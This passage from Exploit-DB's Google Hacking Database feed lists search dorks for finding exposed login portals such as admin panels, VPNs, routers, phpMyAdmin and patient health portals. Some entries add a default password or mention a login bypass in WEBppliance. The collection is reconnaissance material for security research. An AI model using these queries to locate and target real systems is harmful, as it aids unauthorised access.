<link>https://www.exploit-db.com/ghdb/7755</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.php site:.in</shortDescription>
<textualDescription># Google Dork: inurl:login.php site:.in
# Pages Containing Login Portals
# Date:10/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>inurl:login.php site:.in</query>
<querystring>https://www.google.com/search?q=inurl:login.php site:.in</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7144</id>
<link>https://www.exploit-db.com/ghdb/7144</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.php site:.nl</shortDescription>
<textualDescription># Google Dork: inurl:login.php site:.nl
# Pages Containing Login Portals
# Date: 29/08/2021
# Exploit Author: Sahil Gupta</textualDescription>
<query>inurl:login.php site:.nl</query>
<querystring>https://www.google.com/search?q=inurl:login.php site:.nl</querystring>
<edb></edb>
<date>2021-09-01</date>
<author>Sahil Gupta</author>
</entry>
<entry>
<id>7162</id>
<link>https://www.exploit-db.com/ghdb/7162</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Inurl:login.rsp &quot;User name&quot;</shortDescription>
<textualDescription># Google Dork: inurl:login.rsp &quot;User name&quot;
# Pages Containing Login Portals
# Date: 22/07/2021
# Exploit Author: Neha Singh
</textualDescription>
<query>Inurl:login.rsp &quot;User name&quot;</query>
<querystring>https://www.google.com/search?q=Inurl:login.rsp &quot;User name&quot;</querystring>
<edb></edb>
<date>2021-09-07</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>7305</id>
<link>https://www.exploit-db.com/ghdb/7305</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.rsp &quot;User name&quot;</shortDescription>
<textualDescription># Google Dork: inurl:login.rsp &quot;User name&quot;
# Pages Containing Login Portals
# Date: 24/09/2021
# Exploit Author: Neha Singh
</textualDescription>
<query>inurl:login.rsp &quot;User name&quot;</query>
<querystring>https://www.google.com/search?q=inurl:login.rsp &quot;User name&quot;</querystring>
<edb></edb>
<date>2021-09-27</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>6676</id>
<link>https://www.exploit-db.com/ghdb/6676</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login.seam</shortDescription>
<textualDescription># Google Dork: inurl:login.seam
# Date: 11/10/2020
# Exploit Author: Javier Bernardo
# Homepage: https://www.hack.com.ar
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:login.seam</query>
<querystring>https://www.google.com/search?q=inurl:login.seam</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>4579</id>
<link>https://www.exploit-db.com/ghdb/4579</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login/?next=/admin/ -https -stackoverflow.com -github.com</shortDescription>
<textualDescription>inurl:login/?next=/admin/ -https -stackoverflow.com -github.com
finds insecured admin logins and Django Admin logins.
By Ozzy</textualDescription>
<query>inurl:login/?next=/admin/ -https -stackoverflow.com -github.com</query>
<querystring>https://www.google.com/search?q=inurl:login/?next=/admin/ -https -stackoverflow.com -github.com</querystring>
<edb></edb>
<date>2017-09-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>7156</id>
<link>https://www.exploit-db.com/ghdb/7156</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login/forgotten</shortDescription>
<textualDescription># Google Dork: inurl:login/forgotten
# Pages Containing Login Portals
# Date: 31/08/2021
# Exploit Author: Vaibhav Kumar Srivastava</textualDescription>
<query>inurl:login/forgotten</query>
<querystring>https://www.google.com/search?q=inurl:login/forgotten</querystring>
<edb></edb>
<date>2021-09-06</date>
<author>Vaibhav Kumar Srivastava</author>
</entry>
<entry>
<id>7505</id>
<link>https://www.exploit-db.com/ghdb/7505</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login/users.pwd</shortDescription>
<textualDescription># Google Dork: inurl:login/users.pwd
# Pages Containing Login Portals
# Date:27/10/2021
# Exploit Author: Neha Singh</textualDescription>
<query>inurl:login/users.pwd</query>
<querystring>https://www.google.com/search?q=inurl:login/users.pwd</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>6135</id>
<link>https://www.exploit-db.com/ghdb/6135</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login_admin &quot;admin&quot;</shortDescription>
<textualDescription># Title: Find admin login panels
# Google Dork: inurl:login_admin &quot;admin&quot;
# Date : 27/05/2020
# Author: Ritik Sahni
</textualDescription>
<query>inurl:login_admin &quot;admin&quot;</query>
<querystring>https://www.google.com/search?q=inurl:login_admin &quot;admin&quot;</querystring>
<edb></edb>
<date>2020-05-27</date>
<author>Ritik Sahni</author>
</entry>
<entry>
<id>7191</id>
<link>https://www.exploit-db.com/ghdb/7191</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login_fail.asp</shortDescription>
<textualDescription># Google Dork: J. Igor Melo
# Pages Containing Login Portals
# Date: 08/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>inurl:login_fail.asp</query>
<querystring>https://www.google.com/search?q=inurl:login_fail.asp</querystring>
<edb></edb>
<date>2021-09-13</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6501</id>
<link>https://www.exploit-db.com/ghdb/6501</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login_up.php &quot;Plesk Onyx&quot;</shortDescription>
<textualDescription># Google Dork: inurl:login_up.php &quot;Plesk Onyx&quot;
# Plesk Onyx login portals.
# Date: 26/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:login_up.php &quot;Plesk Onyx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:login_up.php &quot;Plesk Onyx&quot;</querystring>
<edb></edb>
<date>2020-08-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5344</id>
<link>https://www.exploit-db.com/ghdb/5344</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:login_user.asp</shortDescription>
<textualDescription>login portal
inurl:login_user.asp
Reza Abasi(Turku)
</textualDescription>
<query>inurl:login_user.asp</query>
<querystring>https://www.google.com/search?q=inurl:login_user.asp</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>3968</id>
<link>https://www.exploit-db.com/ghdb/3968</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:logon.html &quot;CSCOE&quot;</shortDescription>
<textualDescription>Pages containing login portals - Web Server Detection
Finds logins portals for Cisco ASA Clientless Webvpn
inurl:logon.html &quot;CSCOE&quot;</textualDescription>
<query>inurl:logon.html &quot;CSCOE&quot;</query>
<querystring>https://www.google.com/search?q=inurl:logon.html &quot;CSCOE&quot;</querystring>
<edb></edb>
<date>2014-10-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>7443</id>
<link>https://www.exploit-db.com/ghdb/7443</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:mail intitle:Webmail - Login</shortDescription>
<textualDescription># Google Dork: inurl:mail intitle:Webmail - Login
# Pages Containing Login Portals
# Date: 15/10/2021
# Exploit Author: César Hernández Obispo
# Mail Service Enumeration
</textualDescription>
<query>inurl:mail intitle:Webmail - Login</query>
<querystring>https://www.google.com/search?q=inurl:mail intitle:Webmail - Login</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>7070</id>
<link>https://www.exploit-db.com/ghdb/7070</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:mailscanner intitle:&quot;mailwatch login page&quot;</shortDescription>
<textualDescription># Google Dork: inurl:mailscanner intitle:&quot;mailwatch login page&quot;
# Category: Pages Containing Login Portals
# Date: 03/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>inurl:mailscanner intitle:&quot;mailwatch login page&quot;</query>
<querystring>https://www.google.com/search?q=inurl:mailscanner intitle:&quot;mailwatch login page&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6842</id>
<link>https://www.exploit-db.com/ghdb/6842</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:Main_Login.asp AND intext:&quot;Sign in with your ASUS router account&quot;</shortDescription>
<textualDescription># Google Dork: inurl:Main_Login.asp AND intext:&quot;Sign in with your ASUS router account&quot;
# Date: 18/03/2021
# Exploit Author: Cuma KURT
# Pages Containing Login Portals
Cuma KURT
*Ethical Hacker | Information Security Engineer
Istanbul - Turkey
</textualDescription>
<query>inurl:Main_Login.asp AND intext:&quot;Sign in with your ASUS router account&quot;</query>
<querystring>https://www.google.com/search?q=inurl:Main_Login.asp AND intext:&quot;Sign in with your ASUS router account&quot;</querystring>
<edb></edb>
<date>2021-03-19</date>
<author>Cuma KURT</author>
</entry>
<entry>
<id>5882</id>
<link>https://www.exploit-db.com/ghdb/5882</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:main_login.html intitle:Netgear</shortDescription>
<textualDescription>Exploit Title: Netgear Switch login pages.
Google dork: inurl:main_login.html intitle:Netgear
Date:4/1/2020
Exploit author: techjohnny
</textualDescription>
<query>inurl:main_login.html intitle:Netgear</query>
<querystring>https://www.google.com/search?q=inurl:main_login.html intitle:Netgear</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Johnny Tech</author>
</entry>
<entry>
<id>5777</id>
<link>https://www.exploit-db.com/ghdb/5777</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:manager/login</shortDescription>
<textualDescription>Provides manager login pages, which are more or less meant for the admins.
By Juveria Banu.
</textualDescription>
<query>inurl:manager/login</query>
<querystring>https://www.google.com/search?q=inurl:manager/login</querystring>
<edb></edb>
<date>2020-03-05</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>5350</id>
<link>https://www.exploit-db.com/ghdb/5350</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:memberlist.php?mode=viewprofile</shortDescription>
<textualDescription>login portal phpBB
inurl:memberlist.php?mode=viewprofile
Reza Abasi(Turku)
</textualDescription>
<query>inurl:memberlist.php?mode=viewprofile</query>
<querystring>https://www.google.com/search?q=inurl:memberlist.php?mode=viewprofile</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5698</id>
<link>https://www.exploit-db.com/ghdb/5698</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:memberlogin.php</shortDescription>
<textualDescription>Login Portal:
inurl:memberlogin.php
Reza Abasi(Turku)
</textualDescription>
<query>inurl:memberlogin.php</query>
<querystring>https://www.google.com/search?q=inurl:memberlogin.php</querystring>
<edb></edb>
<date>2020-01-23</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>211</id>
<link>https://www.exploit-db.com/ghdb/211</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:metaframexp/default/login.asp | intitle:&quot;Metaframe XP Login&quot;</shortDescription>
<textualDescription>These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site.</textualDescription>
<query>inurl:metaframexp/default/login.asp | intitle:&quot;Metaframe XP Login&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Ametaframexp%2Fdefault%2Flogin.asp+%7C+intitle%3A%22Metaframe+XP+Login%22</querystring>
<edb></edb>
<date>2004-05-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>503</id>
<link>https://www.exploit-db.com/ghdb/503</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:mewebmail</shortDescription>
<textualDescription>MailEnable Standard Edition provides robust SMTP and POP3 services for Windows NT/2000/XP/2003 systems. This version is free for both personal and commercial usage and does not have any time, user or mailbox restrictions.This search is a portal search. If finds the logins screens. If a vulnerability is found, this search becomes the target base for an attacker.</textualDescription>
<query>inurl:mewebmail</query>
<querystring>https://www.google.com/search?q=inurl:mewebmail&amp;filter=0</querystring>
<edb></edb>
<date>2004-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>204</id>
<link>https://www.exploit-db.com/ghdb/204</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:names.nsf?opendatabase</shortDescription>
<textualDescription>A Login portal for Lotus Domino servers. Attackers can attack this page or use it to gather information about the server.</textualDescription>
<query>inurl:names.nsf?opendatabase</query>
<querystring>https://www.google.com/search?q=inurl%3Anames.nsf%3Fopendatabase</querystring>
<edb></edb>
<date>2004-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>7606</id>
<link>https://www.exploit-db.com/ghdb/7606</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:newsdesk.cgi?</shortDescription>
<textualDescription># Google Dork: inurl:newsdesk.cgi?
# Pages Containing Login Portals
# Date: 05/11/2021
# Exploit Author: Shubh Mishra</textualDescription>
<query>inurl:newsdesk.cgi?</query>
<querystring>https://www.google.com/search?q=inurl:newsdesk.cgi?</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Shubh Mishra</author>
</entry>
<entry>
<id>6725</id>
<link>https://www.exploit-db.com/ghdb/6725</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:nidp/idff/sso</shortDescription>
<textualDescription># Google Dork: inurl:nidp/idff/sso
# Pages Containing Login Portals
# Date: 12/10/2020
# Exploit Author: Javier Bernardo
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:nidp/idff/sso</query>
<querystring>https://www.google.com/search?q=inurl:nidp/idff/sso</querystring>
<edb></edb>
<date>2020-12-11</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>7087</id>
<link>https://www.exploit-db.com/ghdb/7087</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:oauth2/v2.0/authorize</shortDescription>
<textualDescription># Google Dork: inurl:oauth2/v2.0/authorize
# Date: 7/22/2020
# Exploit Author: Javier Bernardo
</textualDescription>
<query>inurl:oauth2/v2.0/authorize</query>
<querystring>https://www.google.com/search?q=inurl:oauth2/v2.0/authorize</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>1166</id>
<link>https://www.exploit-db.com/ghdb/1166</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:ocw_login_username</shortDescription>
<textualDescription>WEBppliance is a software application designed to automate the deployment and management of Web-hosting services. There is a bug in how this product does the Logon validation. This Search will take you directly into the Admin pages....U can delete an User....(Plz dont do that..)Enjoy,Night Hacker</textualDescription>
<query>inurl:ocw_login_username</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=inurl%3Aocw_login_username</querystring>
<edb></edb>
<date>2005-10-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>5211</id>
<link>https://www.exploit-db.com/ghdb/5211</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:office365 AND intitle:&quot;Sign In | Login | Portal&quot;</shortDescription>
<textualDescription>Dork:
inurl:office365 AND intitle:&quot;Sign In | Login | Portal&quot;
Description:
Office 365 Login Portals
</textualDescription>
<query>inurl:office365 AND intitle:&quot;Sign In | Login | Portal&quot;</query>
<querystring>https://www.google.com/search?q=inurl:office365 AND intitle:&quot;Sign In | Login | Portal&quot;</querystring>
<edb></edb>
<date>2019-05-13</date>
<author>Isaiah Puzon</author>
</entry>
<entry>
<id>6743</id>
<link>https://www.exploit-db.com/ghdb/6743</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:oidc/authorize</shortDescription>
<textualDescription># Google Dork: inurl:oidc/authorize
# Date: 12/21/2020
# Exploit Author: Javier Bernardo
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:oidc/authorize</query>
<querystring>https://www.google.com/search?q=inurl:oidc/authorize</querystring>
<edb></edb>
<date>2021-01-07</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>7074</id>
<link>https://www.exploit-db.com/ghdb/7074</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:openam/XUI</shortDescription>
<textualDescription># Google Dork: inurl:openam/XUI
# Category: Pages Containing Login Portals
# Dork Author: Nijin K
</textualDescription>
<query>inurl:openam/XUI</query>
<querystring>https://www.google.com/search?q=inurl:openam/XUI</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Nijin K</author>
</entry>
<entry>
<id>841</id>
<link>https://www.exploit-db.com/ghdb/841</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:orasso.wwsso_app_admin.ls_login</shortDescription>
<textualDescription>Oracle provides a Single Sign-On solution which is quite widely spread as it integrates quite seemlessly into exisitng appllications (as Oracle says).If the link itself shows an empty page, try the directory below.</textualDescription>
<query>inurl:orasso.wwsso_app_admin.ls_login</query>
<querystring>https://www.google.com/search?q=inurl%3Aorasso.wwsso_app_admin.ls_login&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6827</id>
<link>https://www.exploit-db.com/ghdb/6827</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:pandora_console intitle:&quot;Pandora FMS&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Radius Manager&quot; intext:&quot;Control Panel&quot;
# Find Pandora FMS control panels
# Date: Mar. 13th,2021
# Author: Kike Fontan
# Reference: https://pandorafms.com/docs/index.php?title=Pandora:Documentation_es:Interfaz
</textualDescription>
<query>inurl:pandora_console intitle:&quot;Pandora FMS&quot;</query>
<querystring>https://www.google.com/search?q=inurl:pandora_console intitle:&quot;Pandora FMS&quot;</querystring>
<edb></edb>
<date>2021-03-16</date>
<author>Kike Fontan</author>
</entry>
<entry>
<id>6356</id>
<link>https://www.exploit-db.com/ghdb/6356</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:passwordvault intext:cyberark</shortDescription>
<textualDescription># Google Dork: inurl:passwordvault intext:cyberark
# Description: discover publicly available CyberArks PVWA portal
# Author: Juan Christian (https://www.linkedin.com/in/juanchristian)
</textualDescription>
<query>inurl:passwordvault intext:cyberark</query>
<querystring>https://www.google.com/search?q=inurl:passwordvault intext:cyberark</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Juan Christian</author>
</entry>
<entry>
<id>6121</id>
<link>https://www.exploit-db.com/ghdb/6121</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:pentaho/Login</shortDescription>
<textualDescription>Find pentaho login portals
*Hilary Soita.*
</textualDescription>
<query>inurl:pentaho/Login</query>
<querystring>https://www.google.com/search?q=inurl:pentaho/Login</querystring>
<edb></edb>
<date>2020-05-25</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>3819</id>
<link>https://www.exploit-db.com/ghdb/3819</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:phpliteadmin.php</shortDescription>
<textualDescription>The default password is 'admin'</textualDescription>
<query>inurl:phpliteadmin.php</query>
<querystring>https://www.google.com/search?q=inurl:phpliteadmin.php</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3881</id>
<link>https://www.exploit-db.com/ghdb/3881</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:phpmyadmin/index.php &amp; (intext:username &amp; password &amp; &quot;Welcome to&quot;)</shortDescription>
<textualDescription>#Summary: PHP Admin login portals
#Author: g00gl3 5c0u7</textualDescription>
<query>inurl:phpmyadmin/index.php &amp; (intext:username &amp; password &amp; &quot;Welcome to&quot;)</query>
<querystring>https://www.google.com/search?q=inurl:phpmyadmin/index.php &amp; (intext:username &amp; password &amp; &quot;Welcome to&quot;)</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4114</id>
<link>https://www.exploit-db.com/ghdb/4114</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:portal | intitle:portal (&quot;login&quot; | &quot;logon&quot; | &quot;admin&quot;) inurl:patient | intitle:patient</shortDescription>
<textualDescription>Patient Health Portals.
Decoy</textualDescription>
<query>inurl:portal | intitle:portal (&quot;login&quot; | &quot;logon&quot; | &quot;admin&quot;) inurl:patient | intitle:patient</query>
<querystring>https://www.google.com/search?q=inurl:portal | intitle:portal (&quot;login&quot; | &quot;logon&quot; | &quot;admin&quot;) inurl:patient | intitle:patient</querystring>
<edb></edb>
<date>2015-11-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>679</id>
<link>https://www.exploit-db.com/ghdb/679</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:postfixadmin intitle:&quot;postfix admin&quot; ext:php</shortDescription>
<textualDescription>Postfix Admin login pages. Duh.</textualDescription>
<query>inurl:postfixadmin intitle:&quot;postfix admin&quot; ext:php</query>
<querystring>https://www.google.com/search?q=inurl%3Apostfixadmin+intitle%3A%22postfix+admin%22+ext%3Aphp</querystring>
<edb></edb>
<date>2004-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>7065</id>
<link>https://www.exploit-db.com/ghdb/7065</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:prweb/PRAuth</shortDescription>
<textualDescription># Google Dork: inurl:prweb/PRAuth
# Date: 6/30/2020
# Exploit Author: Javier Bernardo
# Pega Platform Login Pages
</textualDescription>
<query>inurl:prweb/PRAuth</query>
<querystring>https://www.google.com/search?q=inurl:prweb/PRAuth</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>5875</id>
<link>https://www.exploit-db.com/ghdb/5875</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:r51173 intext:&quot;Keep me logged in&quot;</shortDescription>
<textualDescription>Category: Pages Containing Login Portals
Nicholas Doropoulos
</textualDescription>
<query>inurl:r51173 intext:&quot;Keep me logged in&quot;</query>
<querystring>https://www.google.com/search?q=inurl:r51173 intext:&quot;Keep me logged in&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>6147</id>
<link>https://www.exploit-db.com/ghdb/6147</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:resetpassword.aspx</shortDescription>
<textualDescription>Dork:
inurl:resetpassword.aspx
Description: This google dork lists out the various pages containing reset
passwords portals.
Author: Abhinav Porwal
</textualDescription>
<query>inurl:resetpassword.aspx</query>
<querystring>https://www.google.com/search?q=inurl:resetpassword.aspx</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>6183</id>
<link>https://www.exploit-db.com/ghdb/6183</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:resetpassword.do</shortDescription>
<textualDescription>Dork: inurl:resetpassword.do
Description: This google dork lists out the various pages containing reset
passwords portals.
Author: Abhinav Porwal
Company: Cyber Defender
LinkedIn: https://www.linkedin.com/in/abhinavporwal6/
</textualDescription>
<query>inurl:resetpassword.do</query>
<querystring>https://www.google.com/search?q=inurl:resetpassword.do</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>7306</id>
<link>https://www.exploit-db.com/ghdb/7306</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:saml2/login</shortDescription>
<textualDescription># Google Dork: inurl:saml2/login
# Pages Containing Login Portals
# Date:27/09/2021
# Exploit Author: Javier Bernardo</textualDescription>
<query>inurl:saml2/login</query>
<querystring>https://www.google.com/search?q=inurl:saml2/login</querystring>
<edb></edb>
<date>2021-09-28</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>7415</id>
<link>https://www.exploit-db.com/ghdb/7415</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:sap/public/ intext:Logon &quot;Password&quot;</shortDescription>
<textualDescription># Google Dork: inurl:sap/public/ intext:Logon &quot;Password&quot;
# Pages Containing Login Portals
# Date:09/10/2021
# Exploit Author: Anmol K Sachan</textualDescription>
<query>inurl:sap/public/ intext:Logon &quot;Password&quot;</query>
<querystring>https://www.google.com/search?q=inurl:sap/public/ intext:Logon &quot;Password&quot;</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>267</id>
<link>https://www.exploit-db.com/ghdb/267</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:search/admin.php</shortDescription>
<textualDescription>phpMySearch is a personal search engine that one can use to provide a search feature for one's own Web site. With this search an attacker can find admin logon screens. This software does not seem to be very popular yet, but would allow attackers to access indexed information about the host if compromised.</textualDescription>
<query>inurl:search/admin.php</query>
<querystring>https://www.google.com/search?q=inurl%3Ainstall.php+intitle%3AphpMySearch</querystring>
<edb></edb>
<date>2004-05-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>4902</id>
<link>https://www.exploit-db.com/ghdb/4902</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:secure/dashboard jspa</shortDescription>
<textualDescription>Access to JIRA dashboards login portals and sometimes direct access to
projects dashboard itself.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:secure/dashboard jspa</query>
<querystring>https://www.google.com/search?q=inurl:secure/dashboard jspa</querystring>
<edb></edb>
<date>2018-08-06</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5115</id>
<link>https://www.exploit-db.com/ghdb/5115</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:shared/login.jsp?/ BMC arsys</shortDescription>
<textualDescription>More BMC remedy portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:shared/login.jsp?/ BMC arsys</query>
<querystring>https://www.google.com/search?q=inurl:shared/login.jsp?/ BMC arsys</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5497</id>
<link>https://www.exploit-db.com/ghdb/5497</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:show_port_res_settings</shortDescription>
<textualDescription>Google Dork Submission for finding Mitel Audio and Web Conferencing login pages.
Author name: MiningOmerta
</textualDescription>
<query>inurl:show_port_res_settings</query>
<querystring>https://www.google.com/search?q=inurl:show_port_res_settings</querystring>
<edb></edb>
<date>2019-09-04</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>5282</id>
<link>https://www.exploit-db.com/ghdb/5282</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:simple/view/login.html</shortDescription>
<textualDescription># Exploit Title: Huawei Lan Switch Login
# Google Dork: inurl:simple/view/login.html
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:simple/view/login.html</query>
<querystring>https://www.google.com/search?q=inurl:simple/view/login.html</querystring>
<edb></edb>
<date>2019-07-16</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>6792</id>
<link>https://www.exploit-db.com/ghdb/6792</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:simplesaml/module</shortDescription>
<textualDescription># Google Dork: inurl:simplesaml/module
# Date: 2/15/2020
# Exploit Author: Javier Bernardo
# Pages Containing Login Portals
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:simplesaml/module</query>
<querystring>https://www.google.com/search?q=inurl:simplesaml/module</querystring>
<edb></edb>
<date>2021-02-16</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6722</id>
<link>https://www.exploit-db.com/ghdb/6722</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:Sitefinity/Authenticate/SWT</shortDescription>
<textualDescription># Google Dork: inurl:Sitefinity/Authenticate/SWT
# Date: 12/1/2020
# Exploit Author: Javier Bernardo
Pages Containing Login Portals
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
Buenos Aires - Argentina
</textualDescription>
<query>inurl:Sitefinity/Authenticate/SWT</query>
<querystring>https://www.google.com/search?q=inurl:Sitefinity/Authenticate/SWT</querystring>
<edb></edb>
<date>2020-12-07</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>1438</id>
<link>https://www.exploit-db.com/ghdb/1438</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:src/login.php</shortDescription>
<textualDescription>Locates SquirrelMail Login Pages
Author: 0daydevilz</textualDescription>
<query>inurl:src/login.php</query>
<querystring>https://www.google.com/search?q=inurl%3Asrc%2Flogin.php&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>6912</id>
<link>https://www.exploit-db.com/ghdb/6912</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:sslvpn_logon.shtml</shortDescription>
<textualDescription>#Dork: inurl:sslvpn_logon.shtml - By Simone Crema
</textualDescription>
<query>inurl:sslvpn_logon.shtml</query>
<querystring>https://www.google.com/search?q=inurl:sslvpn_logon.shtml</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>Simone Crema</author>
</entry>
<entry>
<id>5140</id>
<link>https://www.exploit-db.com/ghdb/5140</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:SSOLogin.jsp intext:&quot;user&quot;</shortDescription>
<textualDescription>Dork : inurl:SSOLogin.jsp intext:&quot;user&quot;
Description : this dork gives you user single sign on (SSO) jsp login portals.
Author : botsec0
</textualDescription>
<query>inurl:SSOLogin.jsp intext:&quot;user&quot;</query>
<querystring>https://www.google.com/search?q=inurl:SSOLogin.jsp intext:&quot;user&quot;</querystring>
<edb></edb>
<date>2019-03-01</date>
<author>botsec0</author>
</entry>
<entry>
<id>5944</id>
<link>https://www.exploit-db.com/ghdb/5944</link>
